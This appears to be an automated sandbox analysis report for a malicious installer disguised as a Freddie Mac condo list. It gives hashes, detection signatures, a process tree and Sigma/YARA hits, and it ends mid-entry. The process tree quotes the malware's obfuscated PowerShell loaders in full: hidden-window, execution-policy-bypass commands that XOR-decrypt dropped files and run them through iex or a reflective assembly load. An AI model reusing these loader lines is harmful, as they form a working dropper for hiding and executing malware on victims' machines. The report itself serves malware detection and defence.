Play interactive tour

Edit tour

Windows Analysis Report Freddie-Mac-Warrantable-Condo-List.exe

Overview

General Information

Sample Name:	Freddie-Mac-Warrantable-Condo-List.exe
Analysis ID:	473045
MD5:	ae5b37182059c7733466788212370e71
SHA1:	e6b0ee285d7042834d23743ad8ca188082ac264f
SHA256:	44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346
Infos:
Most interesting Screenshot:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Powershell dedcode and execute

Multi AV Scanner detection for submitted file

Sigma detected: Encoded FromBase64String

Sigma detected: Powershell Decrypt And Execute Base64 Data

Sigma detected: FromBase64String Command Line

Bypasses PowerShell execution policy

Suspicious powershell command line found

Writes many files with high entropy

Powershell creates an autostart link

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Found evasive API chain checking for process token information

Contains functionality to launch a program with higher privileges

Creates a start menu entry (Start Menu\Programs\Startup)

PE / OLE file has an invalid certificate

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Freddie-Mac-Warrantable-Condo-List.exe (PID: 3164 cmdline: 'C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe' MD5: AE5B37182059C7733466788212370E71)

Freddie-Mac-Warrantable-Condo-List.tmp (PID: 5344 cmdline: 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe' MD5: 8693B9CFB8B4C466AE12CCDC2FEB46CE)

AcroRd32.exe (PID: 4936 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf' MD5: B969CF0C7B2C443A99034881E8C8740A)

AcroRd32.exe (PID: 1488 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf' MD5: B969CF0C7B2C443A99034881E8C8740A)

RdrCEF.exe (PID: 6604 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 7152 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=6276574450601077519 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6276574450601077519 --renderer-client-id=2 --mojo-platform-channel-handle=1692 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 1180 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=1744333678202893021 --mojo-platform-channel-handle=1700 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 2052 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8461560770759488801 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8461560770759488801 --renderer-client-id=4 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 6960 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1409198475444217207 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1409198475444217207 --renderer-client-id=5 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 5968 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=296205125084197778 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=296205125084197778 --renderer-client-id=6 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

powershell.exe (PID: 5312 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 4424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6184 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6584 cmdline: powershell MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6324 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 3476 cmdline: powershell MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6384 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5508 cmdline: powershell MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6452 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5700 cmdline: 'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()' MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5352 cmdline: powershell MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.RDwWASt6.20210828000501.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.n4qSLmb6.20210828000459.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.OHVMY+dj.20210828000500.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.gRShAM7L.20210828000505.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.+ee_YVKB.20210828000458.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
C:\Users\user\Documents\20210828\PowerShell_transcript.179605.atyuF1G2.20210828000500.txt	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Encoded FromBase64String

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp, ParentProcessId: 5344, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe

Sigma detected: FromBase64String Command Line

Show sources

Source: Process started

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' 